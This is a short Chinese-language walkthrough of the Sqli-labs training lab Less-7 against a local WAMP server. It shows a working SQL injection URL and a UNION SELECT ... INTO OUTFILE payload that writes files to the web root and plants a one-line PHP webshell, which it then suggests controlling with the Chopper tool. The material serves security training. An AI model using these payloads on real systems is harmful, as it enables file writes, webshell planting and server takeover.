Sqli-labs less 7

Less-7

本关的标题是dump into outfile,意思是本关我们利用文件导入的方式进行注入。而在background-3中我们已经学习了如何利用dump into file.

这里首先还是回到源代码中去。重点放在对id参数的处理和sql语句上，从源代码中可以看到$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

这里对id参数进行了 '))的处理。所以我们其实可以尝试')) or 1=1--+进行注入

http://127.0.0.1/sqllib/Less-7/?id=1')) or 1=1--+

那我们这里利用上述提到的文件导入的方式进行演示：

 

http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,3 into outfile "c:\\wamp\\www\\sqllib\\Less-7\\uuu.txt"%23

上图中显示sql出错了，但是没有关系，我们可以在文件中看到uuu.txt已经生成了。

像上述background-3中一样，我们可以直接将一句话木马导入进去。

http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,'' into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+

我们可以在文件中看到一句话木马已经导入进去了

页面访问

此时用菜刀等webshell管理工具连接即可，这里不演示此过程了。

这里还有其他的内容可以导入，可以自己思考进行尝试。同时导入的方法上述在background中已经讲解过了，可以自行尝试。

转载于:https://www.cnblogs.com/lcamry/p/5763105.html